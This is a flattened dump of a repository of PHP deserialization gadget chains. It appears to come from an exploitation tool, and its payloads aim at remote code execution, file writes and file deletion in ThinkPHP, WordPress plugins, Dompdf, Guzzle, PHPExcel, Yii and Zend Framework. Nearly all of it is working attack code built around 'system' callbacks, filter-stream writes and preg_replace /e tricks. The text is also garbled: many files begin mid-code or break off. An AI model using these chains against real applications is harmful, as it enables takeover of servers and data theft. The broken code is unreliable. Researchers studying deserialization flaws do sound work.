-------------------------------------------------------------------------------- /gadgetchains/TCPDF/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | imagekeys = [ 8 | $remote_path 9 | ]; 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | pathPrefix = '/'; 8 | } 9 | } 10 | class Local extends AbstractAdapter{ 11 | 12 | } 13 | } 14 | 15 | namespace League\Flysystem\Cached\Storage { 16 | use \League\Flysystem\Adapter\Local; 17 | abstract class AbstractCache{ 18 | protected $autosave = false; 19 | protected $cache = []; 20 | function __construct($code) 21 | { 22 | $this->autosave = false; 23 | $this->cache = ["axin"=>$code]; 24 | } 25 | } 26 | 27 | class Adapter extends AbstractCache{ 28 | protected $adapter; 29 | protected $file; 30 | function __construct($path, $code) 31 | { 32 | parent::__construct($code); 33 | $this->adapter = new \League\Flysystem\Adapter\Local(); 34 | $this->file = $path; 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | complete = \str_rot13($data); 11 | } 12 | } 13 | } 14 | 15 | namespace think\filesystem { 16 | class CacheStore extends \League\Flysystem\Cached\Storage\AbstractCache { 17 | protected $store; 18 | protected $key; 19 | protected $expire; 20 | 21 | public function __construct($path, $data) 22 | { 23 | parent::__construct($data); 24 | $this->key = "syclover"; 25 | $this->expire = 1; 26 | $this->store = new \think\cache\driver\File($path); 27 | } 28 | } 29 | } 30 | 31 | namespace think\cache { 32 | abstract class Driver { 33 | protected $writeTimes = 0; 34 | } 35 | } 36 | 37 | namespace think\cache\driver { 38 | class File extends 
\think\cache\Driver { 39 | protected $options; 40 | 41 | public function __construct($path) 42 | { 43 | $this->options = [ 44 | 'expire' => 0, 45 | 'cache_subdir' => false, 46 | 'prefix' => '', 47 | 'path' => "php://filter/write=string.rot13/resource=$path", 48 | 'hash_type' => 'md5', 49 | 'data_compress' => false, 50 | 'tag_prefix' => 'tag:', 51 | 'serialize' => [], 52 | ]; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | files = array($files); 9 | } 10 | } 11 | } 12 | 13 | namespace think\model\concern { 14 | trait Conversion 15 | { 16 | protected $append = array("Smi1e" => "1"); 17 | } 18 | 19 | trait Attribute 20 | { 21 | private $data; 22 | private $withAttr = array("Smi1e" => "system"); 23 | 24 | public function get($system) 25 | { 26 | $this->data = array("Smi1e" => "$system"); 27 | } 28 | } 29 | } 30 | namespace think { 31 | abstract class Model 32 | { 33 | use model\concern\Attribute; 34 | use model\concern\Conversion; 35 | } 36 | } 37 | 38 | namespace think\model{ 39 | use think\Model; 40 | class Pivot extends Model 41 | { 42 | public function __construct($system) 43 | { 44 | $this->get($system); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | Pivot 9 | private $withAttr = []; # assert 10 | protected $hidden = []; 11 | private $data = []; 12 | protected $withEvent = false; 13 | private $force = false; 14 | protected $field = []; 15 | protected $schema = []; 16 | 17 | function __construct($func, $val){ 18 | $this->lazySave = true; 19 | $this->exists = true; 20 | $this->withEvent = false; 21 | $this->force = true; 22 | $this->connection = "mysql"; 23 | $this->withAttr = ["test"=>$func]; 24 | $this->data = 
["test"=>$val]; 25 | $this->hidden = ["test"=>"123"]; 26 | 27 | $this->field = []; 28 | $this->schema = []; 29 | } 30 | } 31 | namespace think\model; 32 | use think\Model; 33 | # Model is an abstract class, so we look for a class that extends it; Pivot is the one chosen here 34 | class Pivot extends Model{ 35 | function __construct($obj="", $func, $val){ 36 | parent::__construct($func, $val); 37 | $this->name = $obj; # $this->name is assigned in the subclass constructor; initialising it as a base-class property does not work 38 | } 39 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | \ adapter = new \think\cache\driver\Memcache($code); 15 | } 16 | } 17 | } 18 | 19 | /* Review note: the Driver stand-in stores a \think\Request object in $handler, and Request in turn sets $filter to a [Php view driver, "display"] callable pair. Only property values are set here; the rest of this file, including the $get assignment, is truncated in this extract. */ namespace think\cache { 20 | abstract class Driver { 21 | protected $handler = null; 22 | protected $options = [ 23 | "prefix" => "" 24 | ]; 25 | 26 | public function __construct($code) 27 | { 28 | $this->handler = new \think\Request($code); 29 | } 30 | } 31 | } 32 | 33 | namespace think\cache\driver { 34 | class Memcache extends \think\cache\Driver { 35 | public function __construct($code) 36 | { 37 | parent::__construct($code); 38 | } 39 | } 40 | } 41 | 42 | namespace think { 43 | class Request { 44 | protected $get; 45 | protected $filter; 46 | 47 | public function __construct($code) { 48 | $this->filter = [ 49 | 0 => [new \think\view\driver\Php, "display"], 50 | ]; 51 | $this->get = ["" 17 | ); 18 | } 19 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | []]; 7 | 8 | public function __construct($func, $cmd){ 9 | $this->relation = false; 10 | $this->data = ['4ut15m'=>$cmd]; //arbitrary; this is the value 11 | $this->withAttr = ['4ut15m'=>$func]; 12 | } 13 | } 14 | } 15 | 16 | namespace think\model { 17 | use think\Model; 18 | class Pivot extends Model{ 19 | } 20 | } 21 | 22 | 23 | namespace think\process\pipes { 24 | use
think\model\Pivot; 25 | class Windows{ 26 | private $files = []; 27 | 28 | public function __construct($func, $cmd){ 29 | $this->files = [new Pivot($func, $cmd)]; //Conversion类 30 | } 31 | 32 | } 33 | } 34 | 35 | namespace think\view\driver { 36 | class Php {} 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类 14 | } 15 | } 16 | } 17 | 18 | namespace think { 19 | 20 | abstract class Model 21 | { 22 | 23 | protected $append = []; 24 | protected $error = null; 25 | public $parent; 26 | 27 | function __construct($output, $modelRelation) 28 | { 29 | 30 | $this->parent = $output; //$this->parent=> think\console\Output; 31 | $this->append = array("xxx" => "getError"); //调用getError 返回this->error 32 | $this->error = $modelRelation; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne 33 | } 34 | } 35 | 36 | class Request 37 | { 38 | protected $get = ['gml' => 'whoami']; 39 | protected $filter = ['system', 'a']; 40 | 41 | public function __construct($code) 42 | { 43 | $this->get = ['gml' => ""]; 44 | $this->filter = [[new \think\view\driver\Php, "display"], 'a']; 45 | } 46 | } 47 | } 48 | 49 | namespace think\model { 50 | 51 | use think\Model; 52 | 53 | class Pivot extends Model 54 | { 55 | 56 | function __construct($output, $modelRelation) 57 | { 58 | 59 | parent::__construct($output, $modelRelation); 60 | } 61 | } 62 | } 63 | 64 | namespace think\model\relation { 65 | 66 | class HasOne extends OneToOne 67 | { 68 | 69 | 70 | } 71 | 72 | 73 | abstract class OneToOne 74 | { 75 | 76 | protected $selfRelation; 77 | protected $bindAttr = []; 78 | protected $query; 79 | 80 | function __construct($query) 81 | { 82 | 83 | $this->selfRelation = 0; 84 | $this->query = $query; //$query指向Query 85 | $this->bindAttr = ['xxx'];// 
$value值,作为call函数引用的第二变量 86 | } 87 | } 88 | 89 | } 90 | 91 | namespace think\db { 92 | 93 | class Query 94 | { 95 | 96 | protected $model; 97 | 98 | function __construct($model) 99 | { 100 | 101 | $this->model = $model; //$this->model=> think\console\Output; 102 | } 103 | } 104 | } 105 | 106 | namespace think\console { 107 | 108 | use think\session\driver\Memcached; 109 | 110 | class Output 111 | { 112 | 113 | private $handle; 114 | protected $styles; 115 | 116 | function __construct($code) 117 | { 118 | 119 | $this->styles = ['getAttr']; 120 | $this->handle = new Memcached($code); //$handle->think\session\driver\Memcached 121 | } 122 | 123 | } 124 | } 125 | 126 | namespace think\session\driver { 127 | 128 | use think\cache\driver\Memcache; 129 | 130 | class Memcached 131 | { 132 | 133 | protected $handler; 134 | protected $config = [ 135 | 'session_name' => '//', 136 | 'expire' => '1' 137 | ]; 138 | 139 | function __construct($code) 140 | { 141 | 142 | $this->handler = new Memcache($code); 143 | } 144 | } 145 | } 146 | 147 | namespace think\cache\driver { 148 | 149 | use think\Request; 150 | 151 | class Memcache 152 | { 153 | protected $handler; 154 | protected $tag = 1; 155 | protected $options = ['prefix' => 'gml/']; 156 | 157 | function __construct($code) 158 | { 159 | $this->handler = new Request($code); 160 | } 161 | } 162 | 163 | } 164 | 165 | namespace think\view\driver { 166 | class Php { 167 | 168 | } 169 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | cache = [""=>""]; 25 | $this->store = $store; 26 | } 27 | } 28 | } 29 | 30 | namespace think\cache{ 31 | abstract class Driver 32 | { 33 | protected $options = ["serialize"=>[[]],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"]; 34 | function __construct() { 35 | $this->options["serialize"][0] = [new 
\think\view\driver\Php(), "display"]; 36 | } 37 | } 38 | } 39 | 40 | namespace think\cache\driver{ 41 | class File extends \think\cache\Driver{ 42 | 43 | } 44 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/7/chain.php: -------------------------------------------------------------------------------- 1 | "); 15 | } 16 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/7/gadgets.php: -------------------------------------------------------------------------------- 1 | lazySave = true; 20 | $this->withEvent = false; 21 | $this->table = new route\Url(new Middleware,new Validate,$cmd); 22 | } 23 | } 24 | class Middleware{ 25 | public $request = 2333; 26 | } 27 | class Validate{ 28 | protected $type; 29 | function __construct(){ 30 | $this->type = [ 31 | "getDomainBind" => [new view\driver\Php,'display'] 32 | ]; 33 | } 34 | } 35 | } 36 | 37 | namespace think\model{ 38 | use think\Model; 39 | class Pivot extends Model{} 40 | } 41 | 42 | namespace think\route{ 43 | class Url 44 | { 45 | protected $url = 'a:'; 46 | protected $domain; 47 | protected $app; 48 | protected $route; 49 | function __construct($app,$route,$cmd){ 50 | $this->domain = $cmd; 51 | $this->app = $app; 52 | $this->route = $route; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Dompdf/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _image_cache = $image_cache; 20 | } 21 | 22 | /* 23 | public function __destruct() 24 | { 25 | foreach ($this->_image_cache as $img) { 26 | // The file might be already deleted by 3rd party tmp cleaner, 27 | // the file might not have been created at all 28 | // (if image outputting commands failed) 29 | // or because the destructor was called twice accidentally. 
30 | if (!file_exists($img)) { 31 | continue; 32 | } 33 | 34 | if ($this->_dompdf->getOptions()->getDebugPng()) { 35 | print '[__destruct unlink ' . $img . ']'; 36 | } 37 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { 38 | unlink($img); 39 | } 40 | } 41 | } 42 | */ 43 | } 44 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Dompdf/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _image_cache = $image_cache; 19 | } 20 | 21 | /* 22 | public function __destruct() 23 | { 24 | foreach ($this->_image_cache as $img) { 25 | // The file might be already deleted by 3rd party tmp cleaner, 26 | // the file might not have been created at all 27 | // (if image outputting commands failed) 28 | // or because the destructor was called twice accidentally. 29 | if (!file_exists($img)) { 30 | continue; 31 | } 32 | 33 | if ($this->_dompdf->getOptions()->getDebugPng()) { 34 | print '[__destruct unlink ' . $img . ']'; 35 | } 36 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { 37 | unlink($img); 38 | } 39 | } 40 | } 41 | */ 42 | } 43 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | $parameter, 'Value' => ''], $function) 19 | ); 20 | } 21 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | data = $data; 17 | } 18 | 19 | /* 20 | public function __toString() 21 | { 22 | $str = $this->data['Name'] . '=' . $this->data['Value'] . '; '; 23 | foreach ($this->data as $k => $v) { 24 | if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) { 25 | if ($k === 'Expires') { 26 | $str .= 'Expires=' . 
gmdate('D, d M Y H:i:s \G\M\T', $v) . '; '; 27 | } else { 28 | $str .= ($v === true ? $k : "{$k}={$v}") . '; '; 29 | } 30 | } 31 | } 32 | return rtrim($str, '; '); 33 | } 34 | */ 35 | } 36 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | $parameter, 'Value' => ''], $function) 19 | ); 20 | 21 | return new \GuzzleHttp\Cookie\FileCookieJar($g); 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | data = $data; 17 | } 18 | 19 | /* 20 | 21 | public function __toString() 22 | { 23 | $str = $this->data['Name'] . '=' . $this->data['Value'] . '; '; 24 | foreach ($this->data as $k => $v) { 25 | if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) { 26 | if ($k === 'Expires') { 27 | $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; '; 28 | } else { 29 | $str .= ($v === true ? $k : "{$k}={$v}") . 
'; '; 30 | } 31 | } 32 | } 33 | return rtrim($str, '; '); 34 | } 35 | 36 | */ 37 | } 38 | class FileCookieJar 39 | { 40 | private $filename; 41 | 42 | public function __construct($cookieFile, $storeSessionCookies = \false) 43 | { 44 | $this->filename = $cookieFile; 45 | } 46 | 47 | /* 48 | 49 | public function __destruct() 50 | { 51 | $this->save($this->filename); 52 | } 53 | 54 | public function save($filename) 55 | { 56 | $json = []; 57 | foreach ($this as $cookie) { 58 | if (\GuzzleHttp\Cookie\CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { 59 | $json[] = $cookie->toArray(); 60 | } 61 | } 62 | $jsonStr = \GuzzleHttp\json_encode($json); 63 | if (\false === \file_put_contents($filename, $jsonStr)) { 64 | throw new \RuntimeException("Unable to save file {$filename}"); 65 | } 66 | } 67 | 68 | */ 69 | } 70 | 71 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/EmailSubscribers/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // @codingStandardsIgnoreLine. 
19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/EverestForms/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose 19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/WooCommerce/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // @codingStandardsIgnoreLine. 19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _handles = $handles; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/YetAnotherStarsRating/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 
-------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php 34 | class PHPExcel_CachedObjectStorage_DiscISAM { 35 | private $fileName = null; 36 | private $fileHandle = 42; 37 | 38 | public function __construct($filePath) { 39 | $this->fileName = $filePath; 40 | } 41 | 42 | /* 43 | public function __destruct() { 44 | if (!is_null($this->fileHandle)) { 45 | fclose($this->fileHandle); // Will only produce a warning 46 | unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | $this->fileHandle = null; 49 | } 50 | */ 51 | } 
-------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php 34 | class PHPExcel_CachedObjectStorage_DiscISAM { 35 | private $_fileName = null; 36 | private $_fileHandle = 42; 37 | 38 | public function __construct($filePath) { 39 | $this->_fileName = $filePath; 40 | } 41 | 42 | /* 43 | public function __destruct() { 44 | if (!is_null($this->_fileHandle)) { 45 | fclose($this->_fileHandle); // Will only produce a warning 46 | unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | $this->fileHandle = null; 49 | } 50 | */ 51 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # 
https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php 34 | class PHPExcel_Shared_XMLWriter { 35 | private $tempFileName = ''; 36 | 37 | public function __construct($filePath) { 38 | $this->tempFileName = $filePath; 39 | } 40 | 41 | /* 42 | public function __destruct() 43 | { 44 | // Unlink temporary files 45 | if ($this->tempFileName != '') { 46 | @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | } 49 | */ 50 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php 34 | class PHPExcel_Shared_XMLWriter { 35 | private $_tempFileName = ''; 36 | 37 | public function __construct($filePath) { 38 | $this->_tempFileName = $filePath; 39 | } 40 | 41 | /* 42 | public function __destruct() 43 | { 44 | // Unlink temporary files 45 | if ($this->_tempFileName != '') { 46 | @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | } 49 | */ 50 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/generic/gadgets.php: -------------------------------------------------------------------------------- 1 | callback = $callback; 42 | } 43 | 44 | /* 45 | public function current() { 46 | 
$value = parent::current(); 47 | $value = call_user_func($this->callback, $value); 48 | return $value; 49 | } 50 | */ 51 | } -------------------------------------------------------------------------------- /gadgetchains/Yii/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _d = $_d; 12 | } 13 | } 14 | 15 | class CDbCriteria 16 | { 17 | function __construct($params) 18 | { 19 | $this->params = $params; 20 | } 21 | } 22 | 23 | class CFileCache 24 | { 25 | public $keyPrefix = ''; 26 | public $hashKey = false; 27 | public $serializer; 28 | 29 | public $cachePath = 'data:text/'; 30 | public $directoryLevel = 0; 31 | public $embedExpiry = true; 32 | public $cacheFileSuffix; 33 | 34 | function __construct($function, $cacheFileSuffix) 35 | { 36 | $this->serializer = [1 => $function]; 37 | $this->cacheFileSuffix = ';base64,' . $cacheFileSuffix; 38 | } 39 | } -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | categoryMap = $categoryMap; 10 | } 11 | } 12 | 13 | class Connection { 14 | public $pdo = 1; 15 | 16 | function __construct($dsn) { 17 | $this->dsn = $dsn; 18 | } 19 | } 20 | 21 | class BatchQueryResult { 22 | private $_dataReader; 23 | 24 | function __construct($dataReader) { 25 | $this->_dataReader = $dataReader; 26 | } 27 | } 28 | } 29 | 30 | namespace yii\caching { 31 | class ArrayCache { 32 | public $serializer; 33 | private $_cache; 34 | 35 | function __construct($function, $parameter) { 36 | $this->serializer = [1 => $function]; 37 | $this->_cache = ['x' => [$parameter, 0]]; 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | writeCallback = $writeCallback; 10 | } 11 | } 12 | } 13 | 14 | 
namespace yii\caching 15 | { 16 | class ExpressionDependency 17 | { 18 | public $expression; 19 | 20 | function __construct($expression) { 21 | $this->expression = $expression; 22 | } 23 | } 24 | } 25 | 26 | namespace yii\db { 27 | class BatchQueryResult { 28 | private $_dataReader; 29 | 30 | function __construct($dataReader) { 31 | $this->_dataReader = $dataReader; 32 | } 33 | } 34 | } 35 | 36 | ?> 37 | -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | processes = [new \Faker\ValidGenerator($code)]; 9 | } 10 | } 11 | } 12 | 13 | namespace Faker { 14 | class ValidGenerator { 15 | protected $generator; 16 | protected $validator; 17 | protected $maxRetries; 18 | 19 | public function __construct($code) 20 | { 21 | $this->generator = new DefaultGenerator($code); 22 | $this->maxRetries = 1; 23 | $this->validator = [new \yii\base\View(), "evaluateDynamicContent"]; 24 | } 25 | } 26 | 27 | class DefaultGenerator { 28 | protected $default; 29 | 30 | public function __construct($code) 31 | { 32 | $this->default = $code; 33 | } 34 | } 35 | } 36 | 37 | namespace yii\base { 38 | class View {} 39 | } 40 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | _cleanup = $cleanup; 13 | $this->stream_name = $stream_name; 14 | } 15 | 16 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | = 7.0.0 14 | - Payload gets executed twice 15 | '; 16 | 17 | public function generate(array $parameters) 18 | { 19 | $code = $parameters['code']; 20 | 21 | return new \Zend_Log( 22 | [new \Zend_Log_Writer_Mail( 23 | [1], 24 | [], 25 | 
new \Zend_Mail, 26 | new \Zend_Layout( 27 | new \Zend_Filter_PregReplace( 28 | "/(.*)/e", 29 | $code 30 | ), 31 | true, 32 | "layout" 33 | ) 34 | )] 35 | ); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _writers = $x; 10 | } 11 | } 12 | 13 | class Zend_Log_Writer_Mail 14 | { 15 | protected $_eventsToMail; 16 | protected $_layoutEventsToMail; 17 | protected $_mail; 18 | protected $_layout; 19 | protected $_subjectPrependText; 20 | 21 | public function __construct( 22 | $eventsToMail, 23 | $layoutEventsToMail, 24 | $mail, 25 | $layout 26 | ) { 27 | $this->_eventsToMail = $eventsToMail; 28 | $this->_layoutEventsToMail = $layoutEventsToMail; 29 | $this->_mail = $mail; 30 | $this->_layout = $layout; 31 | $this->_subjectPrependText = null; 32 | } 33 | } 34 | 35 | class Zend_Mail 36 | {} 37 | 38 | class Zend_Layout 39 | { 40 | protected $_inflector; 41 | protected $_inflectorEnabled; 42 | protected $_layout; 43 | 44 | public function __construct( 45 | $inflector, 46 | $inflectorEnabled, 47 | $layout 48 | ) { 49 | $this->_inflector = $inflector; 50 | $this->_inflectorEnabled = $inflectorEnabled; 51 | $this->_layout = $layout; 52 | } 53 | } 54 | 55 | class Zend_Filter_PregReplace 56 | { 57 | protected $_matchPattern; 58 | protected $_replacement; 59 | 60 | public function __construct( 61 | $matchPattern, 62 | $replacement 63 | ) { 64 | $this->_matchPattern = $matchPattern; 65 | $this->_replacement = $replacement; 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _name = $_name; 41 | $this->id = $id; 42 | $this->_decorators = $_decorators; 43 | $this->_view = $_view; 44 | } 45 | } 46 | 47 | class 
Zend_Form_Decorator_Form extends Zend_Form_Decorator_Abstract 48 | { 49 | protected $_helper = 'call'; 50 | } 51 | 52 | abstract class Zend_Form_Decorator_Abstract 53 | { 54 | protected $_placement = 'APPEND'; 55 | protected $_element; 56 | protected $_options = array(); 57 | protected $_separator = PHP_EOL; 58 | } 59 | 60 | class Zend_Cache_Frontend_Function 61 | { 62 | protected $_specificOptions = array( 63 | 'cache_by_default' => false, 64 | 'cached_functions' => array(), 65 | 'non_cached_functions' => array() 66 | ); 67 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | writers = array( 8 | new \Zend\Log\Writer\Mail($function, $param) 9 | ); 10 | } 11 | } 12 | } 13 | 14 | namespace Zend\Log\Writer { 15 | class Mail { 16 | protected $eventsToMail; 17 | protected $subjectPrependText; 18 | protected $numEntriesPerPriority; 19 | 20 | function __construct($function, $param) { 21 | $this->eventsToMail = array(0); 22 | $this->subjectPrependText = ""; 23 | $this->numEntriesPerPriority = array( 24 | 0 => new \Zend\Tag\Cloud($function, $param) 25 | ); 26 | } 27 | } 28 | } 29 | 30 | namespace Zend\Tag { 31 | class Cloud { 32 | protected $tags; 33 | protected $tagDecorator; 34 | 35 | function __construct($function, $param) { 36 | $this->tags = array(""); 37 | $this->tagDecorator = new \Zend\Tag\Cloud\Decorator\HtmlCloud($function, $param); 38 | } 39 | } 40 | } 41 | 42 | namespace Zend\Tag\Cloud\Decorator { 43 | class HtmlCloud { 44 | protected $separator; 45 | protected $escaper; 46 | protected $htmlTags; 47 | 48 | function __construct($function, $param) { 49 | $this->separator = ""; 50 | $this->htmlTags = array( 51 | "h" => array( 52 | "a" => "!" 
53 | ) 54 | ); 55 | $this->escaper = new \Zend\Escaper\Escaper($function, $param); 56 | } 57 | } 58 | } 59 | 60 | namespace Zend\Escaper { 61 | class Escaper { 62 | protected $htmlAttrMatcher; 63 | 64 | function __construct($function, $param) { 65 | $this->htmlAttrMatcher = array( 66 | new \Zend\Filter\FilterChain($function, $param), 67 | "filter" 68 | ); 69 | } 70 | } 71 | } 72 | 73 | namespace Zend\Filter { 74 | class FilterChain { 75 | protected $filters; 76 | 77 | function __construct($function, $param) { 78 | $this->filters = new \SplFixedArray(2); 79 | $this->filters[0] = array( 80 | new \Zend\Json\Expr($param), 81 | "__toString" 82 | ); 83 | $this->filters[1] = $function; 84 | } 85 | } 86 | } 87 | 88 | namespace Zend\Json { 89 | class Expr { 90 | protected $expression; 91 | 92 | function __construct($param) { 93 | $this->expression = $param; 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | = 7.0.0 14 | '; 15 | 16 | public function generate(array $parameters) 17 | { 18 | return new \Zend_Log( 19 | [new \Zend_Log_Writer_Mail( 20 | [1], 21 | [], 22 | new \Zend_Mail, 23 | new 